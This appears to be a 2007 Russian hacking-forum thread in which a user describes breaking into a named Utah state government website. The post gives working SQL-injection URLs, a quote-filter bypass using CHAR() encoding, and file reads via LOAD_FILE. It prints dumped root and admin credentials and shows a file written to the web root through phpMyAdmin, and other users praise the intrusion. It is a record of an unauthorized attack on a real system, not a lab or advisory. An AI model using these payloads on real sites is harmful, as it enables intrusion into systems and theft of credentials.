Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Заливаем шелл на .gov (https://forum.antichat.xyz/showthread.php?t=46680)

[53x]Shadow 14.08.2007 02:26
Заливаем шелл на .gov
 
В принципе банальная скуля, но все таки удалось залить шелл на gov, при фильтрации ковычек...
Подумал, новичкам будет интересно, если что модеры смело переносите в скули ;)

www.dfcm.utah.gov

Сначала как обычно:
Код:
http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8/*
4.0.18-log
dfcmadmin@dfcm.utah.gov
dfcm


Думал на этом все закончится, при чем кавычки экранируются...
Но
Код:
http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,user,password,5,6,7,8+from+mysql.user+limit+0,1/*
root:2e64a4f076c68549

и есть filepriv
Код:
http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,3,LOAD_FILE(CHAR(47,101,116,99,47,104,116,116,112,100,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)),5,6,7,8+from+mysql.user/*
читаем /etc/passwd для проверки, естественно с обходом фильтрации через char().
Заодно перелопатил все стандартные пути к конфигам, нашел вроде httpd.conf - оказался левый, ну думаю совсем плохо путей то нет((

Да еще into outfile не катит кавычки фильтруются и ничего не помагает ни хекс, ни чар(((

Зато нашел таблицу login
Код:
http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,username,password,5,6,7,8+from+login/*
и вытащил
admin:gmjbcbss

Обрадовался, есть админка и пасс подошел
http://www.dfcm.utah.gov/admin/

Но оказалась тупая цмска по управлению проектами и новостями, попытался через аплоады файлов, а там фильтрация и только .pdf вообщем парился долго, забил...
Думаю все, НО тут вспомнил про хеш рута, и решил а почему бы и нет, короче в джоник его и о счастье нашел (пасс выкладывать не буду чтобы сайт сразу не роняли все кому не лень)!

Бегом в phpMyAdmin, ну думаю пора заливать =).

Достаем пути до сайта, спасибо ettee, а то ночной затуп =\
Код:
http://www.dfcm.utah.gov/phpmyadmin/phpinfo.php
Ну и через sql заливаем
Код:
select 'test' from login into outfile '../../../apache/htdocs/df.txt';
Вообщем тестовый файл смотреть здесь http://www.dfcm.utah.gov/df.txt

ЗЫ
За стиль описания прошу сильно не ругаться, писал в почти сонном состоянии =\

Spyder 14.08.2007 21:52
спс, как раз на пиво не хватает)

guest3297 14.08.2007 22:00
ммм сори но что это за наркоманство?

Цитата:
select 'test' from login into outfile '../../../apache/htdocs/df.txt';
Дальше корня не убежишь.

[53x]Shadow 14.08.2007 22:28
Цитата:
Сообщение от [ cash ]
ммм сори но что это за наркоманство?

Дальше корня не убежишь.
Просто не прописал оставшуюся часть, чтобы все подряд не заливали =\

Dimon_Aka_Sexxx 15.08.2007 11:48
Красиво )

fly 15.08.2007 18:49
Типично! 5 из 10 gov или edu уязвимы на скули.!!!!!

[53x]Shadow 15.08.2007 19:23
Цитата:
Сообщение от fly
Типично! 5 из 10 gov или edu уязвимы на скули.!!!!!
Ну я бы не был так категоричен, это смотря по какому критерию отбирать! А так если через гугл, то имхо 1 из 10 и причем не всегда мона шелл пропихнуть... А в разделе скулей я вообще не видел ни одной доведенной до заливки =\

blackybr 15.08.2007 19:36
молодец, +

я бы еще 3 способа заливки здесь описал )

iv. 15.08.2007 19:56
Вы под колпаком.

[53x]Shadow 18.08.2007 22:27
Цитата:
Сообщение от iv.
Вы под колпаком.
эт ты к чему вообще?!?! =\
А что, прокси кто-то отменял?


Время: 09:22
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице